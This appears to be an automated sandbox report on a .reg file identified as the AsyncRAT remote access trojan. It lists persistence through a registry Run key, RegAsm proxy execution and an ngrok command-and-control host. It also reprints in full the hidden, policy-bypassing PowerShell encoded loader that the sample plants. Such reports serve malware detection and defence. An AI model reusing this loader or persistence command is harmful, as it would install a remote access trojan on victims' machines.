Analysis Overview
SHA256
cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c
Threat Level: Known bad
The file YjJqp0O3NZzC.reg was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Asyncrat family
Async RAT payload
System Binary Proxy Execution: Regsvcs/Regasm
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Runs .reg file with regedit
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Runs regedit.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 21:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 21:54
Reported
2024-11-07 21:57
Platform
win7-20240903-en
Max time kernel
129s
Max time network
127s
Command Line
Signatures
AsyncRat
Asyncrat family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Binary Proxy Execution: Regsvcs/Regasm
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=" | C:\Windows\regedit.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=" | C:\Windows\regedit.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8A